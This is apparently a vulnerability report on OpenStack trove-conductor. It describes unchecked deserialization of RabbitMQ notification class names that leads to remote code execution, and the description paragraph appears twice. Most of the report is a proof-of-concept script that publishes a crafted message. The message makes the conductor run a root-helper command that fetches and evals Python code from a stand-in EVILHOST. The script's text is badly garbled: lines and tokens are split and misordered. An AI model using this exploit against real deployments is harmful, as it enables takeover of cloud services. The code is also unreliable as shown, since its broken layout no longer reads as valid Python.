Trove-conductor allows remote DB instance to to describe class name of serialized notification and performs it's deserialization. The security issue is that trove-conductor doesn't check the class name, so attacker can create instance of arbitrary type, and, moreover, as long as instantiating and function call have the same syntax in python - call arbitrary function. It can lead to remote code execution in trove-conductor instance. The attacker has to know only credentials to authenticate in rabbitmq to be able to communicate with trove-conductor. Credentials are usually stored in DB instance, so that's not a big proble.
Trove-conductor allows remote DB instance to to describe class name of serialized notification and performs it's deserialization. The security issue is that trove-conductor doesn't check the class name, so attacker can create instance of arbitrary type, and, moreover, as long as instantiating and function call have the same syntax in python - call arbitrary function. It can lead to remote code execution in trove-conductor instance. The attacker has to know only credentials to authenticate in rabbitmq to be able to communicate with trove-conductor. Credentials are usually stored in DB instance, so that's not a big proble.
Example of exploit:
```
import uuid
import pika
import json
HOST = "trove_ conductor_ hostname" conductor_ port" userid" password"
PORT = "trove_
LOGIN = "your_rabbit_
PASSWORD = "your_rabbit_
credentials = pika.PlainCrede ntials( username= LOGIN, password=PASSWORD) Parameters( host=HOST, port=PORT, credentials= credentials) nnection( parameters)
parameters = pika.Connection
connection = pika.BlockingCo
channel = connection. channel( )
"_unique_ id": str(uuid.uuid4()), 08bfe0a8c010c36 6f1", 808ddf95d05748b 0a6793bb0ee8d35 70",
"serialize d_notification" : {
"run_ as_root" : True,
"root_ helper" : "python -c 'eval(_ _import_ _(\"requests\ ").get( \"http:// EVILHOST/ shell.py\").text)'",
"notification _classname" : "oslo_concurren cy.processutils .execute" },
"notificat ion_args" : {}},
pld = json.dumps({
"oslo.message": json.dumps({
"_msg_id": "bdbe9981fdf84a
"version": "1.0",
"_timeout": None,
"_reply_q": "reply_
"args": {
"method": "notify_end"}),
"oslo.version": "2.0"})
channel. basic_publish(
exchange= 'trove' ,
routing_ key='trove- conductor' ,
properties= pika.BasicPrope rties(
content_ type='applicati on/json' ,
headers= None
body=pld,
)
)
```